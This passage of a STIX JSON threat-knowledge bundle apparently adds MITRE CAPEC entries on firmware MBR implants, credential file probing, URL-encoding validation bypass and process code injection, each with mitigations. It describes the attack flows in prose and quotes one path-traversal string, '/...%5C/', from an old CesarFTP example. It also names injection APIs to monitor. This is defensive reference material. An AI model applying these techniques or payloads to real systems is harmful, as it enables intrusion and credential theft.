"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca571029-201a-4dbc-aaa9-e3179a745f60", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59dd4ce4-6777-41cd-ae1f-56718a9b85a1", + "target_ref": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust identification and audit/blocking via using an allowlist of applications on your system. Malware may contain the functionality associated with this attack pattern.", + "id": "course-of-action--2d0dcdc8-f803-406a-8cd3-f6e1207c9ed7", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-637-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--19f949ab-5e38-4bef-be5d-dcdcfbc6b2eb", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d0dcdc8-f803-406a-8cd3-f6e1207c9ed7", + "target_ref": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits systems features and/or improperly protected firmware of hardware components, such as Hard Disk Drives (HDD), with the goal of executing malicious code from within the component's Master Boot Record (MBR). Conducting this type of attack entails the adversary infecting the target with firmware altering malware, using known tools, and a payload. Once this malware is executed, the MBR is modified to include instructions to execute the payload at desired intervals and when the system is booted up. A successful attack will obtain persistence within the victim system even if the operating system is reinstalled and/or if the component is formatted or has its data erased.", + "external_references": [ + { + "external_id": "CAPEC-638", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/638.html" + }, + { + "description": "Pre-OS Boot:Component Firmware", + "external_id": "T1542.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/002" + }, + { + "description": "EQUATION GROUP: QUESTIONS AND ANSWERS (1.5), 2015--02, Kaspersky Lab HQ", + "external_id": "REF-664", + "source_name": "reference_from_CAPEC", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + }, + { + "description": "Preston Hood, Hard Drive Firmware Implant IRATEMONK, 2014--10---26, PJHoodsCo Blog", + "external_id": "REF-665", + "source_name": "reference_from_CAPEC", + "url": "https://blog.pjhoodsco.org/hard-drive-firmware-implant-iratemonk/" + }, + { + "description": "Bruce Schneier, IRATEMONK: NSA Exploit of the Day, 2014--01---31, Schneier on Security", + "external_id": "REF-666", + "source_name": "reference_from_CAPEC", + "url": "https://www.schneier.com/blog/archives/2014/01/iratemonk_nsa_e.html" + } + ], + "id": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Altered Component Firmware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data", + "Modify Data" + ], + "Authentication": [ + "Gain Privileges", + "Execute Unauthorized Commands", + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Gain Privileges", + "Execute Unauthorized Commands", + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In 2014, the Equation group was observed levering known malware tools to conduct component firmware alteration attacks against hard drives. In total, 12 HDD categories were shown to be vulnerable from manufacturers such as Western Digital, HGST, Samsung, and Seagate. Because of their complexity, only a few victims were targeted by these attacks. [REF-664]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Select Target: The adversary searches for a suitable target to attack, such as government and/or private industry organizations.

    2. Techniques
    Conduct reconnaissance to determine potential targets to exploit.

  2. Identify Components: After selecting a target, the adversary determines whether a vulnerable component, such as a specific make and model of a HDD, is contained within the target system.

    3. Techniques
    [Remote Access Vector] The adversary gains remote access to the target, typically via additional malware, and explores the system to determine hardware components that are being leveraged.
    [Physical Access Vector] The adversary intercepts components in transit and determines if the component is vulnerable to attack.

Experiment

  1. Optional: Create Payload: If not using an already existing payload, the adversary creates their own to be executed at defined intervals and upon system boot processes. This payload may then be tested on the target system or a test system to confirm its functionality.

Exploit

  1. Insert Firmware Altering Malware: Once a vulnerable component has been identified, the adversary leverages known malware tools to infect the component's firmware and drop the payload within the component's MBR. This allows the adversary to maintain persistence on the target and execute the payload without being detected.

    2. Techniques
    The adversary inserts the firmware altering malware on the target component, via the use of known malware tools.
    [Physical Access Vector] The adversary then sends the component to its original intended destination, where it will be installed onto a victim system.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target component's firmware", + "Advanced knowledge about Master Boot Records (MBR)", + "Advanced knowledge about tools used to insert firmware altering malware.", + "Advanced knowledge about component shipments to the target organization." + ], + "x_capec_resources_required": [ + "Manufacturer source code for hardware components.", + "Malware tools used to insert malware and payload onto target component.", + "Either remote or physical access to the target component." + ], + "x_capec_skills_required": { + "High": "Ability to intercept components in transit.", + "Low": "Ability to leverage known malware tools to infect target system and insert firmware altering malware/payload", + "Medium": "Ability to create malicious payload to be executed from MBR." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage hardware components known to not be susceptible to these types of attacks.", + "id": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6dea11a-edca-4ae2-903f-37ba52f94b7d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "target_ref": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement hardware RAID infrastructure.", + "id": "course-of-action--e992e312-e11f-4f4a-8e35-0f0e3178301e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48c6816a-fb7e-4d07-bd6d-26b9d0326f98", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e992e312-e11f-4f4a-8e35-0f0e3178301e", + "target_ref": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-639", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/639.html" + }, + { + "external_id": "CWE-552", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html" + }, + { + "description": "Data from Network Shared Drive", + "external_id": "T1039", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1039" + }, + { + "description": "Unsecured Credentials: Credentials in Files", + "external_id": "T1552.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/001" + }, + { + "description": "Unsecured Credentials: Bash History", + "external_id": "T1552.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/003" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "Unsecured Credentials: Group Policy Preferences", + "external_id": "T1552.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/006" + } + ], + "id": "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Probe System Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.", + "Adversaries may search network shares on computers they have compromised to find files of interest." + ], + "x_capec_prerequisites": [ + "An adversary has access to the file system of a system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary.", + "id": "course-of-action--f7009ea8-ba2d-4cdb-86fe-352bd35ae5ff", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-639-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--89b16bf7-ab18-4a61-a200-04e7a496d723", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7009ea8-ba2d-4cdb-86fe-352bd35ae5ff", + "target_ref": "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "external_id": "CAPEC-64", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker accesses the server using a specific URL.

Experiment

  1. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.

Exploit

  1. The attacker crafts a malicious URL string request and sends it to the server.

  2. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e5df63e2-b26c-43a9-b8db-2987556afde6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4d3b43e0-c4ff-4ab4-abd0-67d7f2037409", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6dd37d7b-5f87-4f59-b359-666ea8c64721", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6ea81ef-0f17-4947-9257-d78e4c27418e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--14d09444-d3f4-4b5d-bd9c-ba056327a444", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78a37ef6-634a-4ba7-95e4-375cdbab4d64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--95070cd8-654a-4ca1-bbdb-e0d859a8c051", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, reflective code loading, and more.", + "external_references": [ + { + "external_id": "CAPEC-640", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/640.html" + }, + { + "external_id": "CWE-114", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Hijack Execution Flow: Dynamic Linker Hijacking", + "external_id": "T1574.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/006" + }, + { + "description": "Hijack Execution Flow: KernelCallbackTable", + "external_id": "T1574.013", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/013" + }, + { + "description": "Reflective Code Loading", + "external_id": "T1620", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1620" + } + ], + "id": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Inclusion of Code in Existing Process", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Execute Unauthorized Commands", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target process: The adversary determines a process with sufficient privileges that they wish to include code into.

    2. Techniques
    On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
    On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

  1. Attempt to include simple code with known output: The adversary attempts to include very simple code into the existing process to determine if the code inclusion worked. The code will differ based on the approach used to include code into an existing process.

Exploit

  1. Include arbitrary code into existing process: Once an adversary has determined that including code into the existing process is possible, they will include code for a targeted purpose, such as accessing that process's memory.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application fails to verify the integrity of the running process that allows an adversary to execute arbitrary code." + ], + "x_capec_skills_required": { + "High": "Knowledge of how to load malicious code into the memory space of a running process, as well as the ability to have the running process execute this code. For example, with DLL injection, the adversary must know how to load a DLL into the memory space of another running process, and cause this process to execute the code inside of the DLL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown or malicious software from loading through using an allowlist policy.", + "id": "course-of-action--9a551de1-20d0-49ee-b6f2-36ad8f61c8e5", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65e58781-40ea-404e-93cf-151d351ad305", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a551de1-20d0-49ee-b6f2-36ad8f61c8e5", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly restrict the location of the software being used.", + "id": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--85d27ab2-ecd4-456d-b89a-b7c4e35486df", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage security kernel modules providing advanced access control and process restrictions like SELinux.", + "id": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4f55ef67-7b67-4bc1-970e-dd7c277df922", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.", + "id": "course-of-action--850b6838-1e26-4f64-8405-94d6c0354c1a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b00d13c-f642-4b89-8b0b-4f4bec45d3e4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--850b6838-1e26-4f64-8405-94d6c0354c1a", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.", + "id": "course-of-action--59902713-d383-4d5a-9f7e-cfabd2804272", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 